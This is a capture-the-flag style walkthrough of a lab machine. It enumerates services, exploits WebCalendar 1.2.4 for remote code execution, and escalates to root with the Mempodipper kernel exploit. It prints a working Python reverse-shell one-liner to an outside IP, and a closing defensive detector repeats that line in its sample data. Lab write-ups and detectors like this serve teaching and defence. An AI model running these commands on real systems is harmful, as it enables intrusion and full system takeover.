Overview

Enumeration

As usual, start with an Nmap scan of the discovered ports.

$ nmap $ip -p21,22,25,53,80 -sVC --version-all
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 5.8p1 Debian 7ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 5b:b4:3f:ad:ac:70:b3:6f:70:db:de:72:11:03:d7:1d (DSA)
| 2048 13:dc:ff:d4:03:51:a5:9f:0c:05:33:82:f0:4a:dd:21 (RSA)
|_ 256 fe:be:7f:91:5c:5e:64:78:0b:35:e4:73:1f:01:f5:a1 (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: ucal.local, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: 2021-11-25T19:56:51+00:00; +5h00m01s from scanner time.
| ssl-cert: Subject: commonName=ucal.local
| Not valid before: 2013-01-14T10:28:18
|_Not valid after: 2023-01-12T10:28:18
53/tcp open domain ISC BIND 9.7.3
| dns-nsid:
|_ bind.version: 9.7.3
80/tcp open http Apache httpd 2.2.20 ((Ubuntu))
|_http-title: Construction Page
|_http-server-header: Apache/2.2.20 (Ubuntu)

Web Fuzzing

$ gobuster dir -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --no-error -q -x php,html,txt
/index (Status: 200) [Size: 5105]
/index.html (Status: 200) [Size: 5105]
/index.html (Status: 200) [Size: 5105]
/resources (Status: 301) [Size: 318] [--> http://192.168.69.37/resources/]
/send.php (Status: 200) [Size: 3168]
/send (Status: 200) [Size: 3168]
/server-status (Status: 403) [Size: 294]
/webcalendar (Status: 301) [Size: 320] [--> http://192.168.69.37/webcalendar/]

Exploitation

Initial Exploitation

  • Intercept the response when browsing to /webcalendar/
  • Change the response status to 200 OK
  • Run searchsploit webcalendar 1.2.4 to locate the matching exploit
$ searchsploit -m php/webapps/18775.php
$ php 18775.php $ip /webcalendar/
+-------------------------------------------------------------+
| WebCalendar <= 1.2.4 Remote Code Executionn Exploit by EgiX |
+-------------------------------------------------------------+
webcalendar-shell# python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.69",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

Privilege Escalation

Mempodipper Exploit | Exploit-DB

www-data@ucal:/var/www$ uname -a
Linux ucal 3.0.0-12-server #20-Ubuntu SMP Fri Oct 7 16:36:30 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
www-data@ucal:/tmp$ chmod +x mempodipper
www-data@ucal:/tmp$ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x401ce8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/18835/mem in child.
[+] Sending fd 7 to parent.
[+] Received fd at 7.
[+] Assigning fd 7 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x401cdc.
[+] Executing su with shellcode.
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cat /root/proof.txt
46bbfb8761dc14181fa0bebf220c7540
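From the defender's side, as an added example that is not part of this writeup: a small Python detector run over constructed process-execution events that flags the two behaviours seen above, the interpreter reverse shell launched from the WebCalendar shell and the su that Mempodipper spawns from a service account. The event format (user|parent_comm|cmdline), the user names and the parent process names are assumptions made for the sample.

```python
import re

# Constructed sample of process-execution events (assumption: a simplified
# "user|parent_comm|cmdline" form, not real auditd/EDR output; adapt the split
# below to your telemetry). Event 2 is the Python reverse shell used above.
SAMPLE_EVENTS = [
    "www-data|apache2|sh -c ls /var/www",
    "www-data|apache2|python -c 'import socket,os,pty;"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    's.connect(("192.168.49.69",443));os.dup2(s.fileno(),0);'
    "os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\")'",
    "www-data|bash|chmod +x mempodipper",
    "www-data|mempodipper|su",
    "alice|bash|python -c 'print(1)'",
    "alice|bash|su -",
]

# Building blocks of an interpreter reverse shell: a socket is created and
# connected, stdio is redirected onto it, then a shell or pty is spawned.
REVERSE_SHELL_MARKERS = [
    r"socket\.socket\(",
    r"\.connect\(",
    r"dup2\(",
    r"pty\.spawn\(|subprocess\.(call|Popen)\(",
]

# Accounts that serve web content and have no legitimate reason to run su.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx"}


def score_reverse_shell(cmdline):
    """Return how many reverse-shell building blocks appear in one command line."""
    return sum(1 for marker in REVERSE_SHELL_MARKERS if re.search(marker, cmdline))


def analyse(events):
    """Return (rule, user, detail) findings for the constructed event stream."""
    findings = []
    for event in events:
        user, parent, cmdline = event.split("|", 2)
        # Three of four markers is enough: variants often drop one (e.g. no pty).
        if score_reverse_shell(cmdline) >= 3:
            findings.append(("reverse_shell", user, cmdline[:40]))
        # Mempodipper finishes by exec'ing su from its own process; a service
        # account invoking su at all is a strong signal, parent kept for triage.
        if cmdline.split()[:1] == ["su"] and user in SERVICE_ACCOUNTS:
            findings.append(("su_from_service_account", user, parent))
    return findings
```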